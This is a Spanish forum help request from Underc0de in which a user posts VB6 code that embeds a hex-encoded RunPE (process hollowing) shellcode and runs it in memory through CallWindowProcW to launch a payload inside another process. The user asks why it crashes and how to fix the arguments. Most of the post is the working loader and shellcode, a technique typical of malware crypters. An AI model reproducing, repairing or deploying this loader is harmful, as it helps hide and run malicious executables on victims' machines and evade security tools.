Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: 1337day en Noviembre 20, 2023, 02:14:42 PM

Título: c++ runpe shellcode
Publicado por: 1337day en Noviembre 20, 2023, 02:14:42 PM
runpe source - https://github.com/d35ha/RunPE/tree/master

Holla Tomé un runpe, extraje el código de máquina y lo convertí a hex
tengo 2 preguntas

1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?

CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0

He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo

¿Me puedes ayudar?

Converted

Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long


Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"

Dim byteCount As Long
byteCount = Len(ShellCode) \ 2


Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)

Dim i As Long
Dim k As Long

For i = 1 To Len(ShellCode) Step 2
    byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
    k = k + 1
Next i

CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0

End Sub
Sólo texto | Texto con Imágenes